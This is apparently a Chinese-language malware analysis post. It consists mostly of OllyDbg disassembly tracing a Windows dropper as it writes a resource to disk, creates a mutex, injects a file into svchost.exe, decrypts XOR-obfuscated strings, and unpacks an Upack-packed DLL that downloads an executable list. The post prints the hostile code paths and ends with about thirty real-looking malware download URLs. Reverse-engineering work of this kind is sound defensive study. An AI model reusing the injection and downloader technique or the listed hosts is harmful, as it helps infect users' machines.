00401635 |. FF15 3C104000 call dword ptr ds :[<&KERNEL32. FindResourceA>>
0040163B |. 8BF0 mov esi ,eax
0040163D |. 85F6 test esi ,esi
0040163F |. 74 60 je short ~Frm. 004016A1
00401641 |. 56 push esi
00401642 |. 6A 00 push 0
00401644 |. FF15 78104000 call dword ptr ds :[<&KERNEL32. SizeofResource>
0040164A |. 8BD8 mov ebx ,eax
0040164C |. 85DB test ebx ,ebx
0040164E |. 74 51 je short ~Frm. 004016A1
00401650 |. 56 push esi
00401651 |. 6A 00 push 0
00401653 |. FF15 7C104000 call dword ptr ds :[<&KERNEL32. LoadResource>]
00401659 |. 8BF8 mov edi ,eax
0040165B |. 85FF test edi ,edi
0040165D |. 74 42 je short ~Frm. 004016A1
0040165F |. 8B5424 10 mov edx ,dword ptr ss :[esp +10 ]
00401663 |. 6A 00 push 0
00401665 |. 6A 00 push 0
00401667 |. 6A 02 push 2
00401669 |. 6A 00 push 0
0040166B |. 6A 00 push 0
0040166D |. 68 00000040 push 40000000
00401672 |. 52 push edx
00401673 |. FF15 80104000 call dword ptr ds :[<&KERNEL32. CreateFileA>]
00401679 |. 8BF0 mov esi ,eax
0040167B |. 85F6 test esi ,esi
0040167D |. 75 04 jnz short ~Frm.00401683
0040167F |. 5F pop edi
00401680 |. 5E pop esi
00401681 |. 5B pop ebx
00401682 |. C3 retn
00401683 |> 8D4424 18 lea eax ,dword ptr ss :[esp +18 ]
00401687 |. 6A 00 push 0
00401689 |. 50 push eax
0040168A |. 53 push ebx
0040168B |. 57 push edi
0040168C |. FF15 84104000 call dword ptr ds :[<&KERNEL32. LockResource>]
00401692 |. 50 push eax
00401693 |. 56 push esi
00401694 |. FF15 88104000 call dword ptr ds :[<&KERNEL32. WriteFile>]
0040169A |. 56 push esi
0040169B |. FF15 90104000 call dword ptr ds :[<&KERNEL32. CloseHandle>]
004016A1 |> 5F pop edi
004016A2 |. 5E pop esi
004016A3 |. 83C8 FF or eax ,FFFFFFFF
004016A6 |. 5B pop ebx
004016A7 \. C3 retn
三、用CreateFileMappingA函数来创建互斥体00401E7A |. 68 18134000 push ~Frm.00401318
00401E7F |. 68 04010000 push 104
00401E84 |. 6A 00 push 0
00401E86 |. 6A 04 push 4
00401E88 |. 6A 00 push 0
00401E8A |. 6A FF push -1
00401E8C |. FF15 4C104000 call dword ptr ds :[<&KERNEL32. CreateFileMapp>
00401E92 |. 6A 00 push 0
00401E94 |. 6A 00 push 0
00401E96 |. 6A 00 push 0
00401E98 |. 68 1F000F00 push 0F001F
00401E9D |. 50 push eax
00401E9E |. FF15 48104000 call dword ptr ds :[<&KERNEL32. MapViewOfFile>>
四、把tmp.tmp注入到进程svchost.exe中来执行00401F13 |. BF 08134000 mov edi ,~Frm.00401308
00401F18 |. 83C9 FF or ecx ,FFFFFFFF
00401F1B |. 33C0 xor eax ,eax
00401F1D |. 8D9424 6C020000 lea edx ,dword ptr ss :[esp +26C]
00401F24 |. F2:AE repne scas byte ptr es :[edi ]
00401F26 |. F7D1 not ecx
00401F28 |. 2BF9 sub edi ,ecx
00401F2A |. 8BF7 mov esi ,edi
00401F2C |. 8BE9 mov ebp ,ecx
00401F2E |. 8BFA mov edi ,edx
00401F30 |. 83C9 FF or ecx ,FFFFFFFF
00401F33 |. F2:AE repne scas byte ptr es :[edi ]
00401F35 |. 8BCD mov ecx ,ebp
00401F37 |. 4F dec edi
00401F38 |. C1E9 02 shr ecx ,2
00401F3B |. F3:A5 rep movs dword ptr es :[edi ],dword ptr ds :[es >
00401F3D |. 8BCD mov ecx ,ebp
00401F3F |. 8D4424 14 lea eax ,dword ptr ss :[esp +14 ]
00401F43 |. 83E1 03 and ecx ,3
00401F46 |. 50 push eax
00401F47 |. F3:A4 rep movs byte ptr es :[edi ],byte ptr ds :[esi ]
00401F49 |. 8D4C24 28 lea ecx ,dword ptr ss :[esp +28 ]
00401F4D |. 8D9424 70020000 lea edx ,dword ptr ss :[esp +270 ]
00401F54 |. 51 push ecx
00401F55 |. 6A 00 push 0
00401F57 |. 6A 00 push 0
00401F59 |. 6A 04 push 4
00401F5B |. 6A 00 push 0
00401F5D |. 6A 00 push 0
00401F5F |. 6A 00 push 0
00401F61 |. 68 F0284000 push ~Frm. 004028F0
00401F66 |. 52 push edx
00401F67 |. FF15 40104000 call dword ptr ds :[<&KERNEL32. CreateProcessA>
00401BA1 |. BE 88114000 mov esi,~Frm.00401188 ; ASCII "kwws9,,`lvmw-hfz62;;-`ln,g2,dfw-bps"
解密算法和上述基本相同,只是把异或的值2改成了300401B0F |. B8 03000000 mov eax ,3
00401B14 |. 8B4D 0C mov ecx ,dword ptr ss :[ebp +C]
00401B17 |> 3106 /xor dword ptr ds :[esi ],eax
00401B19 |. 46 |inc esi
00401B1A |.^ E2 FB \loopd short ~Frm. 00401B17
该文件加了Upack 0.3.9 beta2s -> Dwing的壳,用ESP定律即可100013D0 55 push ebp //OEP
100013D1 8BEC mov ebp ,esp
100013D3 8B45 0C mov eax ,dword ptr ss :[ebp +C]
100013D6 53 push ebx
100013D7 56 push esi
100013D8 83F8 01 cmp eax ,1
100013DB 57 push edi
100013DC 75 2F jnz short tmp. 1000140D
100013DE 60 pushad
100013DF 90 nop
100013E0 F5 cmc
一,创建线程,进行相关动作100013E5 ? 6A 00 push 0
100013E7 . 6A 00 push 0
100013E9 . 6A 00 push 0
100013EB . 68 50140010 push tmp.10001450
100013F0 . 6A 00 push 0
100013F2 . 6A 00 push 0
100013F4 . FF15 00200010 call dword ptr ds :[10002000 ]
其中ThreadFunction = tmp.10001450
解密后的下载地址为堆栈地址为http://g.sog369.com/fz.txt ,为1个下载列表
下载该列表到临时文件夹下,改名为pctools.tmp10001691 |> /8D95 C8FDFFFF /lea edx ,dword ptr ss :[ebp -238 ]
10001697 |. |52 |push edx
10001698 |. |68 04010000 |push 104
1000169D |. |FF15 1C200010 |call dword ptr ds :[1000201C]
100016A3 |. |B9 41000000 |mov ecx ,41
100016A8 |. |33C0 |xor eax ,eax
100016AA |. |8DBD CCFEFFFF |lea edi ,dword ptr ss :[ebp -134 ]
100016B0 |. |8D95 CCFEFFFF |lea edx ,dword ptr ss :[ebp -134 ]
100016B6 |. |F3:AB |rep stos dword ptr es :[edi ]
100016B8 |. |8DBD C8FDFFFF |lea edi ,dword ptr ss :[ebp -238 ]
100016BE |. |83C9 FF |or ecx ,FFFFFFFF
100016C1 |. |F2:AE |repne scas byte ptr es :[edi ]
100016C3 |. |F7D1 |not ecx
100016C5 |. |2BF9 |sub edi ,ecx
100016C7 |. |8BC1 |mov eax ,ecx
100016C9 |. |8BF7 |mov esi ,edi
100016CB |. |8BFA |mov edi ,edx
100016CD |. |8D95 C8FDFFFF |lea edx ,dword ptr ss :[ebp -238 ]
100016D3 |. |C1E9 02 |shr ecx ,2
100016D6 |. |F3:A5 |rep movs dword ptr es :[edi ],dword ptr ds :[e>
100016D8 |. |8BC8 |mov ecx ,eax
100016DA |. |33C0 |xor eax ,eax
100016DC |. |83E1 03 |and ecx ,3
100016DF |. |F3:A4 |rep movs byte ptr es :[edi ],byte ptr ds :[esi >
100016E1 |. |BF 68300010 |mov edi ,tmp.10003068
100016E6 |. |83C9 FF |or ecx ,FFFFFFFF
100016E9 |. |F2:AE |repne scas byte ptr es :[edi ]
100016EB |. |F7D1 |not ecx
100016ED |. |2BF9 |sub edi ,ecx
100016EF |. |8BF7 |mov esi ,edi
100016F1 |. |8BD9 |mov ebx ,ecx
100016F3 |. |8BFA |mov edi ,edx
100016F5 |. |83C9 FF |or ecx ,FFFFFFFF
100016F8 |. |F2:AE |repne scas byte ptr es :[edi ]
100016FA |. |8BCB |mov ecx ,ebx
100016FC |. |4F |dec edi
100016FD |. |C1E9 02 |shr ecx ,2
10001700 |. |F3:A5 |rep movs dword ptr es :[edi ],dword ptr ds :[e>
10001702 |. |8BCB |mov ecx ,ebx
10001704 |. |83E1 03 |and ecx ,3
10001707 |. |F3:A4 |rep movs byte ptr es :[edi ],byte ptr ds :[esi >
10001709 |> |6A 00 |/push 0
1000170B |. |8D85 C8FDFFFF ||lea eax ,dword ptr ss :[ebp -238 ]
10001711 |. |6A 00 ||push 0
10001713 |. |8D8D C4F8FFFF ||lea ecx ,dword ptr ss :[ebp -73C]
10001719 |. |50 ||push eax
1000171A |. |51 ||push ecx
1000171B |. |6A 00 ||push 0
1000171D |. |FF15 C0300010 ||call dword ptr ds :[100030C0]
10001723 |. |85C0 ||test eax ,eax
10001725 |.^|75 E2 |\jnz short tmp.10001709
下载列表为:http://u 8.dtw360.com/sb/ ko.exe
http://u 1.dtw360.com/la/ fm.exe
http://u 2.dtw360.com/gb/ B1.exe
http://u 1.dtw360.com/la/ L1.exe
http://u 1.dtw360.com/la/ L3.exe
http://u 1.dtw360.com/la/ L4.exe
http://u 2.dtw360.com/gz/ G3.exe
http://u 2.dtw360.com/gz/ G10.exe
http://u 2.dtw360.com/gz/ G1.exe
http://u 2.dtw360.com/gz/ G15.exe
http://u 2.dtw360.com/gz/ G4.exe
http://u 2.dtw360.com/gz/ G31.exe
http://u 2.dtw360.com/gz/ G32.exe
http://u 2.dtw360.com/gz/ G14.exe
http://u 2.dtw360.com/gz/ G9.exe
http://u 1.dtw360.com/la/ L17.exe
http://u 1.dtw360.com/la/ L6.exe
http://u 1.dtw360.com/la/ L9.exe
http://u 1.dtw360.com/la/ L8.exe
http://u 3.dtw360.com/lm/ S20.exe
http://u 3.dtw360.com/lm/ S8.exe
http://u 3.dtw360.com/lm/ S10.exe
http://u 3.dtw360.com/lm/ S1.exe
http://u 3.dtw360.com/lm/ S15.exe
http://u 3.dtw360.com/lm/ S2.exe
http://u 3.dtw360.com/lm/ S3.exe
http://u 3.dtw360.com/lm/ S5.exe
http://u 3.dtw360.com/lm/ S19.exe
http://u 3.dtw360.com/lm/ S14.exe
http://u 3.dtw360.com/lm/ S13.exe
http://u 9.dtw360.com/cj/ a6.exe
http://u 9.dtw360.com/cj/ a2.exe
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http://u 8.dtw360.com/sb/ sb.exe